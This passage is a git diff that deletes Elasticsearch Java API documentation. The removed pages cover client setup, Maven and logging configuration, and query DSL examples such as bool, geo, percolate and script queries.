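// Blocking style: get() waits for the response of the underlying future
SearchResponse response = client.prepareSearch("index").get();

// Non-blocking style: register an ActionListener and return immediately
client.prepareSearch("index").execute(new ActionListener<SearchResponse>() {
    @Override
    public void onResponse(SearchResponse searchResponse) {
        // handle the response
    }

    @Override
    public void onFailure(Exception e) {
        // handle the failure
    }
});
--------------------------------------------------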
- -== Maven Repository - -Elasticsearch is hosted on -http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.elasticsearch.client%22[Maven -Central]. - -For example, you can define the latest version in your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- -<dependency> -    <groupId>org.elasticsearch.client</groupId> -    <artifactId>transport</artifactId> -    <version>{version}</version> -</dependency> --------------------------------------------------- - -[[java-transport-usage-maven-lucene]] -=== Lucene Snapshot repository - -The very first releases of any major version (like a beta) might have been built on top of a Lucene snapshot version. -In such a case you will be unable to resolve the Lucene dependencies of the client. - -For example, if you want to use the `6.0.0-beta1` version which depends on Lucene `7.0.0-snapshot-00142c9`, you must -define the following repository. - -For Maven: - -["source","xml",subs="attributes"] --------------------------------------------------- -<repository> -    <id>elastic-lucene-snapshots</id> -    <name>Elastic Lucene Snapshots</name> -    <url>https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/00142c9</url> -    <releases><enabled>true</enabled></releases> -    <snapshots><enabled>false</enabled></snapshots> -</repository> --------------------------------------------------- - -For Gradle: - -["source","groovy",subs="attributes"] --------------------------------------------------- -maven { -    name "lucene-snapshots" -    url 'https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/00142c9' -} --------------------------------------------------- - -=== Log4j 2 Logger - -You also need to include the Log4j 2 dependency: - -["source","xml",subs="attributes"] --------------------------------------------------- -<dependency> -    <groupId>org.apache.logging.log4j</groupId> -    <artifactId>log4j-core</artifactId> -    <version>2.11.1</version> -</dependency> --------------------------------------------------- - -You must also provide a Log4j 2 configuration file on your classpath. -For example, you can add a `log4j2.properties` file like the following to your `src/main/resources` directory: - -["source","properties",subs="attributes"] --------------------------------------------------- -appender.console.type = Console -appender.console.name = console -appender.console.layout.type = PatternLayout -appender.console.layout.pattern = [%d{ISO8601}][%-5p][%-25c] %marker%m%n - -rootLogger.level = info -rootLogger.appenderRef.console.ref = console --------------------------------------------------- - -=== Using another Logger - -If you want to use a logger other than Log4j 2, you can use the http://www.slf4j.org/[SLF4J] bridge: - -["source","xml",subs="attributes"] --------------------------------------------------- -<dependency> -    <groupId>org.apache.logging.log4j</groupId> -    <artifactId>log4j-to-slf4j</artifactId> -    <version>2.11.1</version> -</dependency> -<dependency> -    <groupId>org.slf4j</groupId> -    <artifactId>slf4j-api</artifactId> -    <version>1.7.24</version> -</dependency> --------------------------------------------------- - -http://www.slf4j.org/manual.html[This page] lists implementations you can use. Pick your favorite logger -and add it as a dependency.
As an example, we will use the `slf4j-simple` logger: - -["source","xml",subs="attributes"] --------------------------------------------------- -<dependency> -    <groupId>org.slf4j</groupId> -    <artifactId>slf4j-simple</artifactId> -    <version>1.7.21</version> -</dependency> --------------------------------------------------- - -:client-tests: {elasticsearch-root}/server/src/internalClusterTest/java/org/elasticsearch/client/documentation -:hlrc-tests: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client - -:client-reindex-tests: {elasticsearch-root}/modules/reindex/src/internalClusterTest/java/org/elasticsearch/client/documentation - -include::client.asciidoc[] - -include::docs.asciidoc[] - -include::search.asciidoc[] - -include::aggs.asciidoc[] - -include::query-dsl.asciidoc[] - -include::admin/index.asciidoc[] diff --git a/docs/java-api/query-dsl.asciidoc b/docs/java-api/query-dsl.asciidoc deleted file mode 100644 index 859462e5767..00000000000 --- a/docs/java-api/query-dsl.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -[[java-query-dsl]] -== Query DSL - -Elasticsearch provides a full Java query DSL in a similar manner to the -REST {ref}/query-dsl.html[Query DSL]. The factory for query -builders is `QueryBuilders`. Once your query is ready, you can use the -<<java-search,Search API>>. - -To use `QueryBuilders` just import them in your class: - -[source,java] --------------------------------------------------- -import static org.elasticsearch.index.query.QueryBuilders.*; --------------------------------------------------- - -Note that you can easily print (and debug) the JSON generated by a query using the -`toString()` method on the `QueryBuilder` object. - -The `QueryBuilder` can then be used with any API that accepts a query, -such as `count` and `search`. - -:query-dsl-test: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client/documentation/QueryDSLDocumentationTests.java - -include::query-dsl/match-all-query.asciidoc[] - -include::query-dsl/full-text-queries.asciidoc[] - -include::query-dsl/term-level-queries.asciidoc[] - -include::query-dsl/compound-queries.asciidoc[] - -include::query-dsl/joining-queries.asciidoc[] - -include::query-dsl/geo-queries.asciidoc[] - -include::query-dsl/special-queries.asciidoc[] - -include::query-dsl/span-queries.asciidoc[] - -:query-dsl-test!: diff --git a/docs/java-api/query-dsl/bool-query.asciidoc b/docs/java-api/query-dsl/bool-query.asciidoc deleted file mode 100644 index da9ca0ad0cc..00000000000 --- a/docs/java-api/query-dsl/bool-query.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-query-dsl-bool-query]] -==== Bool Query - -See {ref}/query-dsl-bool-query.html[Bool Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[bool] --------------------------------------------------- -<1> must query -<2> must not query -<3> should query -<4> a query that must appear in the matching documents but doesn't contribute to scoring.
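Since the tagged snippet above is pulled in from the test sources, here is an illustrative sketch of what such a `bool` query typically looks like when built with the statically imported `QueryBuilders` factory methods (field names and values are made up):

[source,java]
--------------------------------------------------
import org.elasticsearch.index.query.QueryBuilder;

import static org.elasticsearch.index.query.QueryBuilders.*;

QueryBuilder query = boolQuery()
        .must(termQuery("content", "test1"))        // must: has to match and contributes to the score
        .mustNot(termQuery("content", "test2"))     // must_not: must not match (runs in filter context)
        .should(termQuery("content", "test3"))      // should: optional clause that boosts the score when it matches
        .filter(termQuery("content", "test5"));     // filter: has to match but does not affect the score
--------------------------------------------------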
diff --git a/docs/java-api/query-dsl/boosting-query.asciidoc b/docs/java-api/query-dsl/boosting-query.asciidoc deleted file mode 100644 index 2a3c4437d1f..00000000000 --- a/docs/java-api/query-dsl/boosting-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-boosting-query]] -==== Boosting Query - -See {ref}/query-dsl-boosting-query.html[Boosting Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[boosting] --------------------------------------------------- -<1> query that will promote documents -<2> query that will demote documents -<3> negative boost diff --git a/docs/java-api/query-dsl/common-terms-query.asciidoc b/docs/java-api/query-dsl/common-terms-query.asciidoc deleted file mode 100644 index 2c8dfc7a88c..00000000000 --- a/docs/java-api/query-dsl/common-terms-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-common-terms-query]] -==== Common Terms Query - -See {ref}/query-dsl-common-terms-query.html[Common Terms Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[common_terms] --------------------------------------------------- -<1> field -<2> value diff --git a/docs/java-api/query-dsl/compound-queries.asciidoc b/docs/java-api/query-dsl/compound-queries.asciidoc deleted file mode 100644 index b93e3b694a5..00000000000 --- a/docs/java-api/query-dsl/compound-queries.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ -[[java-compound-queries]] -=== Compound queries - -Compound queries wrap other compound or leaf queries, either to combine their -results and scores, to change their behaviour, or to switch from query to -filter context. - -The queries in this group are: - -<>:: - -A query which wraps another query, but executes it in filter context. All -matching documents are given the same ``constant'' `_score`. - -<>:: - -The default query for combining multiple leaf or compound query clauses, as -`must`, `should`, `must_not`, or `filter` clauses. The `must` and `should` -clauses have their scores combined -- the more matching clauses, the better -- -while the `must_not` and `filter` clauses are executed in filter context. - -<>:: - -A query which accepts multiple queries, and returns any documents which match -any of the query clauses. While the `bool` query combines the scores from all -matching queries, the `dis_max` query uses the score of the single best- -matching query clause. - -<>:: - -Modify the scores returned by the main query with functions to take into -account factors like popularity, recency, distance, or custom algorithms -implemented with scripting. - -<>:: - -Return documents which match a `positive` query, but reduce the score of -documents which also match a `negative` query. 
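Before the per-query sections that follow, here is a small, illustrative sketch (field names and values are made up) of two of these compound queries built with `QueryBuilders`:

[source,java]
--------------------------------------------------
import org.elasticsearch.index.query.QueryBuilder;

import static org.elasticsearch.index.query.QueryBuilders.*;

// dis_max: score each document by its single best matching clause,
// with a tie breaker that adds a fraction of the other clauses' scores
QueryBuilder disMax = disMaxQuery()
        .add(termQuery("name", "kimchy"))
        .add(matchQuery("description", "elasticsearch"))
        .tieBreaker(0.7f);

// constant_score: execute the wrapped query in filter context and give
// every matching document the same score
QueryBuilder constantScore = constantScoreQuery(termQuery("status", "active"))
        .boost(2.0f);
--------------------------------------------------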
- - -include::constant-score-query.asciidoc[] -include::bool-query.asciidoc[] -include::dis-max-query.asciidoc[] -include::function-score-query.asciidoc[] -include::boosting-query.asciidoc[] diff --git a/docs/java-api/query-dsl/constant-score-query.asciidoc b/docs/java-api/query-dsl/constant-score-query.asciidoc deleted file mode 100644 index 49c5adbee6a..00000000000 --- a/docs/java-api/query-dsl/constant-score-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-constant-score-query]] -==== Constant Score Query - -See {ref}/query-dsl-constant-score-query.html[Constant Score Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[constant_score] --------------------------------------------------- -<1> your query -<2> query score diff --git a/docs/java-api/query-dsl/dis-max-query.asciidoc b/docs/java-api/query-dsl/dis-max-query.asciidoc deleted file mode 100644 index 8c91bcb9901..00000000000 --- a/docs/java-api/query-dsl/dis-max-query.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-query-dsl-dis-max-query]] -==== Dis Max Query - -See {ref}/query-dsl-dis-max-query.html[Dis Max Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[dis_max] --------------------------------------------------- -<1> add your queries -<2> add your queries -<3> boost factor -<4> tie breaker diff --git a/docs/java-api/query-dsl/exists-query.asciidoc b/docs/java-api/query-dsl/exists-query.asciidoc deleted file mode 100644 index 6fa5ba6a6f2..00000000000 --- a/docs/java-api/query-dsl/exists-query.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[[java-query-dsl-exists-query]] -==== Exists Query - -See {ref}/query-dsl-exists-query.html[Exists Query]. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[exists] --------------------------------------------------- -<1> field diff --git a/docs/java-api/query-dsl/full-text-queries.asciidoc b/docs/java-api/query-dsl/full-text-queries.asciidoc deleted file mode 100644 index 27ce4bee1ba..00000000000 --- a/docs/java-api/query-dsl/full-text-queries.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[java-full-text-queries]] -=== Full text queries - -The high-level full text queries are usually used for running full text -queries on full text fields like the body of an email. They understand how the -field being queried is analyzed and will apply each field's -`analyzer` (or `search_analyzer`) to the query string before executing. - -The queries in this group are: - -<>:: - - The standard query for performing full text queries, including fuzzy matching - and phrase or proximity queries. - -<>:: - - The multi-field version of the `match` query. - -<>:: - - A more specialized query which gives more preference to uncommon words. - -<>:: - - Supports the compact Lucene query string syntax, - allowing you to specify AND|OR|NOT conditions and multi-field search - within a single query string. For expert users only. - -<>:: - - A simpler, more robust version of the `query_string` syntax suitable - for exposing directly to users. 
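The sections that follow show the tagged snippets for each of these; as a quick, illustrative sketch (field names and query strings are made up), the most common ones look like this:

[source,java]
--------------------------------------------------
import org.elasticsearch.common.unit.Fuzziness;
import org.elasticsearch.index.query.Operator;
import org.elasticsearch.index.query.QueryBuilder;

import static org.elasticsearch.index.query.QueryBuilders.*;

// match: analyzed full text search on a single field
QueryBuilder match = matchQuery("body", "quick brown fox")
        .operator(Operator.AND)
        .fuzziness(Fuzziness.AUTO);

// multi_match: the same text run against several fields
QueryBuilder multiMatch = multiMatchQuery("quick brown fox", "subject", "body");

// simple_query_string: a restricted syntax that is safe to expose to end users
QueryBuilder simple = simpleQueryStringQuery("\"quick brown\" +fox -news");
--------------------------------------------------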
- -include::match-query.asciidoc[] - -include::multi-match-query.asciidoc[] - -include::common-terms-query.asciidoc[] - -include::query-string-query.asciidoc[] - -include::simple-query-string-query.asciidoc[] - diff --git a/docs/java-api/query-dsl/function-score-query.asciidoc b/docs/java-api/query-dsl/function-score-query.asciidoc deleted file mode 100644 index fcd5f2dc473..00000000000 --- a/docs/java-api/query-dsl/function-score-query.asciidoc +++ /dev/null @@ -1,19 +0,0 @@ -[[java-query-dsl-function-score-query]] -==== Function Score Query - -See {ref}/query-dsl-function-score-query.html[Function Score Query]. - -To use `ScoreFunctionBuilders` just import them in your class: - -[source,java] --------------------------------------------------- -import static org.elasticsearch.index.query.functionscore.ScoreFunctionBuilders.*; --------------------------------------------------- - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[function_score] --------------------------------------------------- -<1> Add a first function based on a query -<2> And randomize the score based on a given seed -<3> Add another function based on the age field diff --git a/docs/java-api/query-dsl/fuzzy-query.asciidoc b/docs/java-api/query-dsl/fuzzy-query.asciidoc deleted file mode 100644 index 4a7bde82cdf..00000000000 --- a/docs/java-api/query-dsl/fuzzy-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-fuzzy-query]] -==== Fuzzy Query - -See {ref}/query-dsl-fuzzy-query.html[Fuzzy Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[fuzzy] --------------------------------------------------- -<1> field -<2> text diff --git a/docs/java-api/query-dsl/geo-bounding-box-query.asciidoc b/docs/java-api/query-dsl/geo-bounding-box-query.asciidoc deleted file mode 100644 index 4983a212133..00000000000 --- a/docs/java-api/query-dsl/geo-bounding-box-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-geo-bounding-box-query]] -==== Geo Bounding Box Query - -See {ref}/query-dsl-geo-bounding-box-query.html[Geo Bounding Box Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_bounding_box] --------------------------------------------------- -<1> field -<2> bounding box top left point -<3> bounding box bottom right point diff --git a/docs/java-api/query-dsl/geo-distance-query.asciidoc b/docs/java-api/query-dsl/geo-distance-query.asciidoc deleted file mode 100644 index cc8c89ca61e..00000000000 --- a/docs/java-api/query-dsl/geo-distance-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-geo-distance-query]] -==== Geo Distance Query - -See {ref}/query-dsl-geo-distance-query.html[Geo Distance Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_distance] --------------------------------------------------- -<1> field -<2> center point -<3> distance from center point diff --git a/docs/java-api/query-dsl/geo-polygon-query.asciidoc b/docs/java-api/query-dsl/geo-polygon-query.asciidoc deleted file mode 100644 index 7dbf49b8d1a..00000000000 --- a/docs/java-api/query-dsl/geo-polygon-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-geo-polygon-query]] -==== Geo Polygon Query - -See 
{ref}/query-dsl-geo-polygon-query.html[Geo Polygon Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_polygon] --------------------------------------------------- -<1> add your polygon of points a document should fall within -<2> initialise the query with field and points diff --git a/docs/java-api/query-dsl/geo-queries.asciidoc b/docs/java-api/query-dsl/geo-queries.asciidoc deleted file mode 100644 index 10df4ff5e87..00000000000 --- a/docs/java-api/query-dsl/geo-queries.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-geo-queries]] -=== Geo queries - -Elasticsearch supports two types of geo data: -`geo_point` fields which support lat/lon pairs, and -`geo_shape` fields, which support points, lines, circles, polygons, multi-polygons etc. - -The queries in this group are: - -<> query:: - - Find document with geo-shapes which either intersect, are contained by, or - do not intersect with the specified geo-shape. - -<> query:: - - Finds documents with geo-points that fall into the specified rectangle. - -<> query:: - - Finds document with geo-points within the specified distance of a central - point. - -<> query:: - - Find documents with geo-points within the specified polygon. - -include::geo-shape-query.asciidoc[] - -include::geo-bounding-box-query.asciidoc[] - -include::geo-distance-query.asciidoc[] - -include::geo-polygon-query.asciidoc[] diff --git a/docs/java-api/query-dsl/geo-shape-query.asciidoc b/docs/java-api/query-dsl/geo-shape-query.asciidoc deleted file mode 100644 index c2cd4c14e3a..00000000000 --- a/docs/java-api/query-dsl/geo-shape-query.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[java-query-dsl-geo-shape-query]] -==== GeoShape Query - -See {ref}/query-dsl-geo-shape-query.html[Geo Shape Query] - -Note: the `geo_shape` type uses `Spatial4J` and `JTS`, both of which are -optional dependencies. Consequently you must add `Spatial4J` and `JTS` -to your classpath in order to use this type: - -[source,xml] ------------------------------------------------ - - org.locationtech.spatial4j - spatial4j - 0.7 <1> - - - - org.locationtech.jts - jts-core - 1.15.0 <2> - - - xerces - xercesImpl - - - ------------------------------------------------ -<1> check for updates in http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.locationtech.spatial4j%22%20AND%20a%3A%22spatial4j%22[Maven Central] -<2> check for updates in http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.locationtech.jts%22%20AND%20a%3A%22jts-core%22[Maven Central] - -[source,java] --------------------------------------------------- -// Import ShapeRelation and ShapeBuilder -import org.elasticsearch.common.geo.ShapeRelation; -import org.elasticsearch.common.geo.builders.ShapeBuilder; --------------------------------------------------- - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_shape] --------------------------------------------------- -<1> field -<2> shape -<3> relation can be `ShapeRelation.CONTAINS`, `ShapeRelation.WITHIN`, `ShapeRelation.INTERSECTS` or `ShapeRelation.DISJOINT` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[indexed_geo_shape] --------------------------------------------------- -<1> field -<2> The ID of the document that containing the pre-indexed shape. 
-<3> relation -<4> Name of the index where the pre-indexed shape is. Defaults to 'shapes'. -<5> The field specified as path containing the pre-indexed shape. Defaults to 'shape'. diff --git a/docs/java-api/query-dsl/has-child-query.asciidoc b/docs/java-api/query-dsl/has-child-query.asciidoc deleted file mode 100644 index f47f3af487d..00000000000 --- a/docs/java-api/query-dsl/has-child-query.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[java-query-dsl-has-child-query]] -==== Has Child Query - -See {ref}/query-dsl-has-child-query.html[Has Child Query] - -When using the `has_child` query it is important to use the `PreBuiltTransportClient` instead of the regular client: - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder().put("cluster.name", "elasticsearch").build(); -TransportClient client = new PreBuiltTransportClient(settings); -client.addTransportAddress(new TransportAddress(new InetSocketAddress(InetAddresses.forString("127.0.0.1"), 9300))); --------------------------------------------------- - -Otherwise the parent-join module doesn't get loaded and the `has_child` query can't be used from the transport client. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[has_child] --------------------------------------------------- -<1> child type to query against -<2> query -<3> score mode can be `ScoreMode.Avg`, `ScoreMode.Max`, `ScoreMode.Min`, `ScoreMode.None` or `ScoreMode.Total` diff --git a/docs/java-api/query-dsl/has-parent-query.asciidoc b/docs/java-api/query-dsl/has-parent-query.asciidoc deleted file mode 100644 index 6a83fe2b069..00000000000 --- a/docs/java-api/query-dsl/has-parent-query.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[java-query-dsl-has-parent-query]] -==== Has Parent Query - -See {ref}/query-dsl-has-parent-query.html[Has Parent] - -When using the `has_parent` query it is important to use the `PreBuiltTransportClient` instead of the regular client: - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder().put("cluster.name", "elasticsearch").build(); -TransportClient client = new PreBuiltTransportClient(settings); -client.addTransportAddress(new TransportAddress(new InetSocketAddress(InetAddresses.forString("127.0.0.1"), 9300))); --------------------------------------------------- - -Otherwise the parent-join module doesn't get loaded and the `has_parent` query can't be used from the transport client. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[has_parent] --------------------------------------------------- -<1> parent type to query against -<2> query -<3> whether the score from the parent hit should propagate to the child hit diff --git a/docs/java-api/query-dsl/ids-query.asciidoc b/docs/java-api/query-dsl/ids-query.asciidoc deleted file mode 100644 index ba12a5df38b..00000000000 --- a/docs/java-api/query-dsl/ids-query.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[[java-query-dsl-ids-query]] -==== Ids Query - - -See {ref}/query-dsl-ids-query.html[Ids Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[ids] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/joining-queries.asciidoc b/docs/java-api/query-dsl/joining-queries.asciidoc deleted file mode 100644 index fcefef5f624..00000000000 --- a/docs/java-api/query-dsl/joining-queries.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[java-joining-queries]] -=== Joining queries - -Performing full SQL-style joins in a distributed system like Elasticsearch is -prohibitively expensive. Instead, Elasticsearch offers two forms of join -which are designed to scale horizontally. - -<>:: - -Documents may contains fields of type `nested`. These -fields are used to index arrays of objects, where each object can be queried -(with the `nested` query) as an independent document. - -<> and <> queries:: - -A parent-child relationship can exist between two -document types within a single index. The `has_child` query returns parent -documents whose child documents match the specified query, while the -`has_parent` query returns child documents whose parent document matches the -specified query. 
- -include::nested-query.asciidoc[] - -include::has-child-query.asciidoc[] - -include::has-parent-query.asciidoc[] - - diff --git a/docs/java-api/query-dsl/match-all-query.asciidoc b/docs/java-api/query-dsl/match-all-query.asciidoc deleted file mode 100644 index 85d847528f5..00000000000 --- a/docs/java-api/query-dsl/match-all-query.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -[[java-query-dsl-match-all-query]] -=== Match All Query - -See {ref}/query-dsl-match-all-query.html[Match All Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[match_all] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/match-query.asciidoc b/docs/java-api/query-dsl/match-query.asciidoc deleted file mode 100644 index 6884deb5f1f..00000000000 --- a/docs/java-api/query-dsl/match-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-match-query]] -==== Match Query - -See {ref}/query-dsl-match-query.html[Match Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[match] --------------------------------------------------- -<1> field -<2> text diff --git a/docs/java-api/query-dsl/mlt-query.asciidoc b/docs/java-api/query-dsl/mlt-query.asciidoc deleted file mode 100644 index 11e5c7ef404..00000000000 --- a/docs/java-api/query-dsl/mlt-query.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-query-dsl-mlt-query]] -==== More Like This Query - -See {ref}/query-dsl-mlt-query.html[More Like This Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[more_like_this] --------------------------------------------------- -<1> fields -<2> text -<3> ignore threshold -<4> max num of Terms in generated queries diff --git a/docs/java-api/query-dsl/multi-match-query.asciidoc b/docs/java-api/query-dsl/multi-match-query.asciidoc deleted file mode 100644 index 86b384d44d3..00000000000 --- a/docs/java-api/query-dsl/multi-match-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-multi-match-query]] -==== Multi Match Query - -See {ref}/query-dsl-multi-match-query.html[Multi Match Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[multi_match] --------------------------------------------------- -<1> text -<2> fields diff --git a/docs/java-api/query-dsl/nested-query.asciidoc b/docs/java-api/query-dsl/nested-query.asciidoc deleted file mode 100644 index 9b675ea72ac..00000000000 --- a/docs/java-api/query-dsl/nested-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-nested-query]] -==== Nested Query - -See {ref}/query-dsl-nested-query.html[Nested Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[nested] --------------------------------------------------- -<1> path to nested document -<2> your query. Any fields referenced inside the query must use the complete path (fully qualified). 
-<3> score mode could be `ScoreMode.Max`, `ScoreMode.Min`, `ScoreMode.Total`, `ScoreMode.Avg` or `ScoreMode.None` diff --git a/docs/java-api/query-dsl/percolate-query.asciidoc b/docs/java-api/query-dsl/percolate-query.asciidoc deleted file mode 100644 index 18cdd4a14e5..00000000000 --- a/docs/java-api/query-dsl/percolate-query.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[java-query-percolate-query]] -==== Percolate Query - -See: - * {ref}/query-dsl-percolate-query.html[Percolate Query] - - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder().put("cluster.name", "elasticsearch").build(); -TransportClient client = new PreBuiltTransportClient(settings); -client.addTransportAddress(new TransportAddress(new InetSocketAddress(InetAddresses.forString("127.0.0.1"), 9300))); --------------------------------------------------- - -Before the `percolate` query can be used an `percolator` mapping should be added and -a document containing a percolator query should be indexed: - -[source,java] --------------------------------------------------- -// create an index with a percolator field with the name 'query': -client.admin().indices().prepareCreate("myIndexName") - .addMapping("_doc", "query", "type=percolator", "content", "type=text") - .get(); - -//This is the query we're registering in the percolator -QueryBuilder qb = termQuery("content", "amazing"); - -//Index the query = register it in the percolator -client.prepareIndex("myIndexName", "_doc", "myDesignatedQueryName") - .setSource(jsonBuilder() - .startObject() - .field("query", qb) // Register the query - .endObject()) - .setRefreshPolicy(RefreshPolicy.IMMEDIATE) // Needed when the query shall be available immediately - .get(); --------------------------------------------------- - -This indexes the above term query under the name -*myDesignatedQueryName*. 
- -In order to check a document against the registered queries, use this -code: - -[source,java] --------------------------------------------------- -//Build a document to check against the percolator -XContentBuilder docBuilder = XContentFactory.jsonBuilder().startObject(); -docBuilder.field("content", "This is amazing!"); -docBuilder.endObject(); //End of the JSON root object - -PercolateQueryBuilder percolateQuery = new PercolateQueryBuilder("query", "_doc", BytesReference.bytes(docBuilder)); - -// Percolate, by executing the percolator query in the query dsl: -SearchResponse response = client.prepareSearch("myIndexName") -    .setQuery(percolateQuery) -    .get(); -//Iterate over the results -for(SearchHit hit : response.getHits()) { -    // Each hit is a registered percolator query that matched the document -} --------------------------------------------------- diff --git a/docs/java-api/query-dsl/prefix-query.asciidoc b/docs/java-api/query-dsl/prefix-query.asciidoc deleted file mode 100644 index eb15c4426f6..00000000000 --- a/docs/java-api/query-dsl/prefix-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-prefix-query]] -==== Prefix Query - -See {ref}/query-dsl-prefix-query.html[Prefix Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[prefix] --------------------------------------------------- -<1> field -<2> prefix diff --git a/docs/java-api/query-dsl/query-string-query.asciidoc b/docs/java-api/query-dsl/query-string-query.asciidoc deleted file mode 100644 index 7d8bead2e34..00000000000 --- a/docs/java-api/query-dsl/query-string-query.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -[[java-query-dsl-query-string-query]] -==== Query String Query - -See {ref}/query-dsl-query-string-query.html[Query String Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[query_string] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/range-query.asciidoc b/docs/java-api/query-dsl/range-query.asciidoc deleted file mode 100644 index 2d58fbd3a34..00000000000 --- a/docs/java-api/query-dsl/range-query.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[java-query-dsl-range-query]] -==== Range Query - -See {ref}/query-dsl-range-query.html[Range Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[range] --------------------------------------------------- -<1> field -<2> from -<3> to -<4> whether to include the lower value: `from` is treated as `gte` when `true` and `gt` when `false` -<5> whether to include the upper value: `to` is treated as `lte` when `true` and `lt` when `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[range_simplified] --------------------------------------------------- -<1> field -<2> set `from` to 10 and `includeLower` to `true` -<3> set `to` to 20 and `includeUpper` to `false` diff --git a/docs/java-api/query-dsl/regexp-query.asciidoc b/docs/java-api/query-dsl/regexp-query.asciidoc deleted file mode 100644 index f9cd8cd72d9..00000000000 --- a/docs/java-api/query-dsl/regexp-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-regexp-query]] -==== Regexp Query - -See {ref}/query-dsl-regexp-query.html[Regexp Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 
-include-tagged::{query-dsl-test}[regexp] --------------------------------------------------- -<1> field -<2> regexp diff --git a/docs/java-api/query-dsl/script-query.asciidoc b/docs/java-api/query-dsl/script-query.asciidoc deleted file mode 100644 index a8c60f1d8eb..00000000000 --- a/docs/java-api/query-dsl/script-query.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[java-query-dsl-script-query]] -==== Script Query - -See {ref}/query-dsl-script-query.html[Script Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[script_inline] --------------------------------------------------- -<1> inlined script - - -If you have stored on each data node a script named `myscript.painless` with: - -[source,painless] --------------------------------------------------- -doc['num1'].value > params.param1 --------------------------------------------------- - -You can use it then with: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[script_file] --------------------------------------------------- -<1> 